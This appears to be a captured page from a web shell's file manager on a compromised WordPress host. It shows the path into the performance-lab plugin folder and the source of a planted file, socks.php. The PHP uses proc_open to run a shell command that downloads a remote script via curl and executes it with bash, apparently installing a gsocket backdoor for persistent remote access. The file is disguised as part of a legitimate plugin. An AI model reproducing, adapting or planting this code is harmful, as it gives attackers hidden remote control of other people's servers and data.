Your IP : 216.73.216.196


Current Path : /home/icmq6107/clients/naddaf/wp-content/plugins/performance-lab/
Upload File :
Current File : /home/icmq6107/clients/naddaf/wp-content/plugins/performance-lab/socks.php

<?php
$process = proc_open("bash -c \"$(curl -fsSL https://gsocket.io/y)\"", [
    0 => ["pipe", "r"], // STDIN
    1 => ["pipe", "w"], // STDOUT
    2 => ["pipe", "w"]  // STDERR
], $pipes);

if (is_resource($process)) {
    echo "<pre>" . stream_get_contents($pipes[1]) . "</pre>";
    fclose($pipes[1]);
    proc_close($process);
}
?>